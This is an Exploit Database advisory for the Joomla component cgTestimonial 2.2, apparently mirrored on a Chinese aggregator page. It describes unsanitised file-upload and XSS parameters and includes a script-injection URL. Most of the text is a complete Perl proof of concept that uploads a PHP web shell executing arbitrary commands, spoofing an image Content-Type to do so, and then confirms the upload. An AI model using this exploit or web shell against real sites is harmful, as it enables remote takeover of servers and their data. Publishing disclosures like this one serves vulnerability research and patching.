Joomla! Component com_cgtestimonial 2.2 – Multiple Vulnerabilities

• Exploit Database
• 29 阅读

• 作者： Salvatore Fresta
  日期： 2010-08-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14569/

• cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities
  
   NamecgTestimonial
   Vendorhttp://www.cmsgalaxy.com
   Versions Affected 2.2
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-08-06
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  ________________________
  
  cg_Testimonial component is atool for adding
  testimonialbythe user from frontend and managing and
  publishing testimonials from backend.
  ThisJoomlaextensionallows website user to submit a
  testimonialsformwithseveralfields on one of your
  site'spageand enableaddingtestimonials by either
  users or admin.
  
  
  II. DESCRIPTION
  _______________
  
  Some parameters are not properly sanitised.The following
  vulnerabilities can be exploited from guest users.
  
  
  III. ANALYSIS
  _____________
  
  Summary:
  
   A) Multiple Arbitrary File Upload
   B) XSS
   
  
  A) Multiple Arbitrary File Upload
  _________________________________
  
  Theusr_imgparameterin cgtestimonial.php (frontend)
  and in testimonial.php(admin, without checks)isnot
  properly sanitised. A checkis executed on the content-
  type HTTP field.
  
  
  B) XSS
  ______
  
  The url parameter in video.php is not properly sanitised
  before being printed on screen.
  
  
  IV. SAMPLE CODE
  _______________
  
  A) Multiple Arbitrary File Upload
  
  http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt
  
  B) XSS
  
  http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
  
  
  V. FIX
  ______
  
  No fix.
  
  ################################ PoC-cgTestimonial2.2.pl ################################
  
  #!/usr/bin/perl
  #
  # PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
  #
  # Author: Salvatore Fresta aka Drosophila
  # Email:salvatorefresta@gmail.com
  #
  # Date: 06 August 2010
  #
  # http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
  #
  
  use IO::Socket;
  
  
  $usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".
   "http://www.salvatorefresta.net\n\n".
   "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";
  
  $#ARGV == 1 || die $usage;
  
  my $host= $ARGV[0];
  my $path= $ARGV[1];
  
  my $stop= 0;
  my $rand= "master".int(rand 150);
  my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";
  my $filename= "evil.php";
  
  my $code= "--AaB03x\r\n".
  "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".
  "Content-Type: image/jpeg\r\n".
  "\r\n".
  "$shell\r\n".
  "--AaB03x--";
  
  my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".
  "Host: $host\r\n".
  "Content-Type: multipart/form-data; boundary=AaB03x\r\n".
  "Content-Length: " .length($code). "\r\n".
  "\r\n".
  $code;
  
  my $socket = new IO::Socket::INET( Proto=> "tcp",
   PeerAddr=> $host,
   PeerPort=> "80"
  ) or die "\n[-] Unable to connect to $host\n\n";
  
  print "\n[+] Connected\n";
  print $socket $pkg;
  
  $pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".
   "Host: $host\r\n\r\n";
  
  print $socket $pkg;
  
  while ((my $rec = <$socket>) && $stop != 1) {
  if($rec !=~ /302 Found/) {
  $stop = 1;
  }
  }
  
  if($stop != 1) {
  print "[-] Shell not uploaded\n";
  close($socket);
  exit;
  }
  
  print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n".
  "[+] Disconnected\n\n";
  
  close($socket);